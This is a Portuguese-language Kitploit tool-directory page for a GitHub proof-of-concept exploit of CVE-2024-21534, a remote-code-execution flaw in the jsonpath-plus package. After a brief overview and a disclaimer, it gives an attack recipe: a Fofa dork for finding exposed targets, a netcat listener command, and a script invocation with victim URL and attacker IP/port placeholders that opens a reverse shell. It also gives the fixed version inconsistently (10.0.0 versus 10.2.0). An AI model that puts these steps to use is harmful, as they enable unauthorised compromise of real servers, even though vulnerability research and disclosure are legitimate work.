Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2024-21534 — POC - CVE-2024-21534 Jsonpath-plus vulnerável a Execução Remota de Código (RCE) devido à sanitização inadequada de entrada | Kitploit
Ferramentas/GitHubGitHub/verylazytech/cve-2024-21534
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubverylazytech/cve-2024-21534

cve-2024-21534

POC - CVE-2024-21534 Jsonpath-plus vulnerável a Execução Remota de Código (RCE) devido à sanitização inadequada de entrada

Ver Repositório
51há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

POC - CVE-2024-21534 Jsonpath-plus vulnerável a Execução Remota de Código (RCE) devido à sanitização inadequada de entrada

My Shop Medium Github Buy Me A Coffee

Visão Geral

CVE-2024-21534 é uma vulnerabilidade crítica encontrada em versões do pacote jsonpath-plus anteriores à versão 10.0.0. A vulnerabilidade decorre da sanitização inadequada de entrada, o que pode levar à Execução Remota de Código (RCE) em sistemas afetados. Essa vulnerabilidade é particularmente perigosa, pois pode ser explorada sem autenticação, permitindo que atacantes executem código arbitrário no servidor enviando entrada especialmente elaborada. Esse problema surge do uso padrão inseguro do módulo vm do Node.js, que, se explorado, pode comprometer todo o sistema.

Versões Afetadas

jsonpath-plus versões anteriores a 10.2.0

Componentes Afetados

A vulnerabilidade está localizada no pacote jsonpath-plus, amplamente utilizado para consultar estruturas de dados JSON em aplicações. A falha se deve à sanitização inadequada de entrada, permitindo a execução de código malicioso.

Leia sobre — CVE-2024-21534

Aviso: Esta Prova de Conceito (POC) foi feita apenas para fins educacionais e de testes éticos. O uso desta ferramenta para atacar alvos sem consentimento mútuo prévio é ilegal. É responsabilidade do usuário final obedecer a todas as leis locais, estaduais e federais aplicáveis. Os desenvolvedores não assumem nenhuma responsabilidade e não são responsáveis por qualquer uso indevido ou danos causados por este programa.

Começando

Encontrando Alvos

Para encontrar possíveis alvos, use o Fofa (semelhante ao Shodan.io):

  • Dork do Fofa: Jsonpath-plus

Fofa

Clonando o Repositório

Primeiro, clone o repositório:

root@kitploit:~
git clone https://github.com/verylazytech/CVE-2024-21534

Agora abra um listener usando nc:

root@kitploit:~
nc -lnvp 443

Execute o exploit:

Para Linux / macOS:

Certifique-se de que a URL aponte para um endpoint que processe a entrada do usuário por meio do pacote jsonpath-plus vulnerável, pois isso permitirá a exploração da vulnerabilidade de RCE.

root@kitploit:~
bash ./cve-2024-21534.sh <VICTIM_URL> <ATTACKER_IP> <ATTACKER_PORT>

secoand

listando alguns diretórios:

last

Baixar ferramenta